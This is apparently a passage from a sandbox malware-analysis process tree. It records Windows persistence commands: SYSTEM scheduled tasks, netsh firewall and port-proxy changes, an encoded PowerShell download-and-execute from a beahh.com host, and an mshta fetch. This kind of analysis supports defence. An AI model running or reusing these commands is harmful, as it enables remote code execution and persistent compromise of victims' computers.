Autostart /tr "c:\windows\VeuxB.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\UfeH.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
PID:2200 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
PID:1776
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
PID:2248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
PID:2592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F5⤵
- Creates scheduled task(s)
PID:2504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\DrHnIEC" /tr "c:\windows\VeuxB.exe" /F5⤵
- Creates scheduled task(s)
PID:2564
-
-
-
-
-
C:\Windows\WQERpIhb.exeC:\Windows\WQERpIhb.exe1⤵PID:1552
-
C:\Windows\HYTnAnEb.exeC:\Windows\HYTnAnEb.exe1⤵PID:1788
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
PID:2540 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
PID:2640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo mBVP >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\UfeH.exe&move /y c:\windows\temp\dig.exe c:\windows\VeuxB.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\LxSz" /tr "c:\windows\VeuxB.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\VeuxB.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\UfeH.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
PID:2736 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
PID:1472
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵PID:2848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
PID:2472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F5⤵
- Creates scheduled task(s)
PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\LxSz" /tr "c:\windows\VeuxB.exe" /F5⤵
- Creates scheduled task(s)
- Modifies data under HKEY_USERS
PID:2848
-
-
-
-
-
C:\Windows\UWByyzrl.exeC:\Windows\UWByyzrl.exe1⤵PID:2504